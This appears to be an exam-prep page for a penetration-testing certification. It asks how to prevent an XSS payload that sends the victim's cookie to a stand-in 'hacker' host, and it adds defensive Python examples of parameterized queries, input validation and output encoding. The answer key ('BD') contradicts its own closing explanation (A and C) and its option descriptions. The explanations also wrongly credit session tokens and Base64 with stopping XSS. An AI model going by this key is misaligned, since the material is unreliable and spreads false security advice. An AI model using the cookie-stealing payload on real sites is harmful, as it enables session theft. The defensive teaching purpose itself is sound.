CompTIA PenTest+ Exam: Preventing Code Injection Attacks

Question

Given the following code: <SCRIPT>var+img=new+Image();img.src='http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

Answers

Explanations


A. Web-application firewall
B. Parameterized queries
C. Output encoding
D. Session tokens
E. Input validation
F. Base64 encoding

BD.

The code provided in the question is an example of a cross-site scripting (XSS) payload, where the attacker injects script into a web page viewed by other users. The script creates a new image object and sets its source to a URL that includes the victim's cookie value; the victim's browser then requests that URL from a remote server controlled by the attacker, handing over the cookie. The options can be evaluated as follows:

A. Web-application firewall: A web-application firewall (WAF) is a security solution that monitors and filters traffic to and from a web application. It can detect and block malicious requests, including XSS attacks. A WAF can also provide additional security features, such as rate limiting, IP blocking, and SSL/TLS offloading.

B. Parameterized queries: Parameterized queries are used to prevent SQL injection attacks. In this type of attack, the attacker injects malicious SQL code into a web application's database query, allowing them to view, modify, or delete sensitive data. Parameterized queries use placeholders for user input; the database engine treats the supplied values as data rather than as part of the query text, so the attacker cannot inject SQL code.
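The following is an added example (not part of the exam page) showing the difference option B describes, using Python's standard sqlite3 module with a constructed in-memory table. The first lookup splices the input into the query text; the second passes it through a placeholder, so the same input is compared as a value and never parsed as SQL.

```python
import sqlite3

# Constructed sample database standing in for the application's user table.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "alice@example.test"), ("bob", "bob@example.test")],
    )
    return conn

def lookup_email_concatenated(conn: sqlite3.Connection, username: str) -> list:
    """The defect that parameterized queries fix: the input is pasted into the
    SQL text, so whatever it contains is parsed as SQL, not treated as a value."""
    sql = f"SELECT email FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_email_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """The placeholder keeps the input on the data side of the parser: the
    engine compares the whole string against the column, never as SQL syntax."""
    sql = "SELECT email FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]

if __name__ == "__main__":
    db = make_db()
    # Constructed test inputs: a normal username and one containing SQL syntax.
    for name in ("alice", "x' OR '1'='1"):
        print(repr(name))
        print("  concatenated :", lookup_email_concatenated(db, name))
        print("  parameterized:", lookup_email_parameterized(db, name))
```

With the normal username both functions return the same single row; with the input that contains SQL syntax the concatenated version returns every row in the table while the parameterized version returns nothing, because no username literally equals that string.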

C. Output encoding: Output encoding is a technique that encodes untrusted data at the point where it is written into a web page. It converts special characters, such as < and >, into their corresponding HTML entities, preventing the browser from interpreting them as HTML markup. Output encoding can prevent XSS attacks, as it ensures that any user-supplied value displayed on a web page is rendered as plain text rather than executed as script.

D. Session tokens: Session tokens are unique identifiers assigned to a user when they log into a web application. They are used to maintain the user's session state and provide access control. Session tokens can prevent XSS attacks by limiting the attacker's ability to access sensitive data or perform actions on behalf of the user.

E. Input validation: Input validation is the process of verifying that user input matches the expected format before it is processed by a web application. It can prevent a wide range of attacks, including XSS, SQL injection, and command injection. Input validation should be performed on both the client side and the server side to ensure that user input is safe and meets the expected format.
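The following is an added example (not from the exam page or CompTIA) covering both option C (output encoding) and option E (input validation). It takes the payload from the question, decoded the way a server would see it, and shows a server-side allowlist check rejecting it outright, then, for cases where a value must be displayed anyway, one encoder per output context (HTML text and attributes, a JavaScript string, a URL parameter). The display-name rule, the page template and the `injected_script_present` check are hypothetical constructions for this example.

```python
import html
import re
from urllib.parse import quote

# Constructed sample: the reflected value from the question, decoded the way
# a server sees it after the URL-encoded '+' and '%20' are translated.
PAYLOAD = "<SCRIPT>var img=new Image();img.src='http://hacker/ ' + document.cookie;</SCRIPT>"

# --- input validation (allowlist) -------------------------------------------
# Hypothetical rule for this example: a display name is 1-32 characters of
# ASCII letters, digits, underscore or hyphen. Anything else is rejected.
DISPLAY_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")

def validate_display_name(value: str) -> bool:
    """Server-side allowlist check. Validation rejects input that does not fit
    the expected shape; it does not try to strip or 'clean' bad characters."""
    return DISPLAY_NAME_RE.fullmatch(value) is not None

# --- output encoding, one encoder per context --------------------------------
def encode_for_html(value: str) -> str:
    """For text between tags and for quoted attribute values: & < > " ' become
    entities, so the browser shows them as characters instead of parsing markup."""
    return html.escape(value, quote=True)

def encode_for_js_string(value: str) -> str:
    """For a value placed inside a JavaScript string literal: every
    non-alphanumeric character becomes \\xHH or \\uHHHH, so it can neither
    close the quote nor end the enclosing <script> element."""
    out = []
    for ch in value:
        code = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif code < 0x100:
            out.append(f"\\x{code:02x}")
        else:
            out.append(f"\\u{code:04x}")
    return "".join(out)

def encode_for_url_param(value: str) -> str:
    """For a value placed in a URL query parameter: percent-encode everything."""
    return quote(value, safe="")

# --- rendering: the defect and the fix side by side -------------------------
TEMPLATE_SCRIPT_COUNT = 1  # the hypothetical page template opens one <script>

def render_unencoded(name: str) -> str:
    """The defect the question illustrates: the value pasted raw into four
    contexts. Kept only so the check below can show the difference."""
    return (f"<h1>Hello, {name}</h1>"
            f'<input name="nick" value="{name}">'
            f"<script>var nick = '{name}';</script>"
            f'<a href="/u?n={name}">profile</a>')

def render_encoded(name: str) -> str:
    """The same page with the encoder chosen per context."""
    return (f"<h1>Hello, {encode_for_html(name)}</h1>"
            f'<input name="nick" value="{encode_for_html(name)}">'
            f"<script>var nick = '{encode_for_js_string(name)}';</script>"
            f'<a href="/u?n={encode_for_url_param(name)}">profile</a>')

def injected_script_present(markup: str) -> bool:
    """Detection check: did the untrusted value introduce a <script element
    beyond the one the template opens? Case-insensitive, like the browser."""
    return markup.lower().count("<script") > TEMPLATE_SCRIPT_COUNT

if __name__ == "__main__":
    print("payload passes validation:", validate_display_name(PAYLOAD))
    print("raw page has injected script:", injected_script_present(render_unencoded(PAYLOAD)))
    print("encoded page has injected script:", injected_script_present(render_encoded(PAYLOAD)))
```

The two controls are complementary: validation stops the payload at the boundary because it does not match the allowlist, and encoding protects the page even for values that legitimately contain characters such as `<` or `'`. The encoder must match the context the value lands in; HTML entities do nothing inside a JavaScript string, which is why the block keeps a separate encoder for that case.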

F. Base64 encoding: Base64 encoding is a technique used to encode binary data as ASCII text. It is often used to transmit data over networks that only support ASCII characters. Base64 encoding can be used to prevent XSS attacks by encoding user input before it is displayed on a web page. However, it is not a complete solution, as an attacker can still decode the encoded data and extract sensitive information.

In the given options, the best methods to prevent the XSS attack in the code provided are web-application firewall (A) and output encoding (C). A web-application firewall can detect and block malicious requests, while output encoding can prevent the browser from interpreting user input as HTML code. However, it is important to note that implementing multiple layers of defense is always recommended to provide maximum protection against attacks.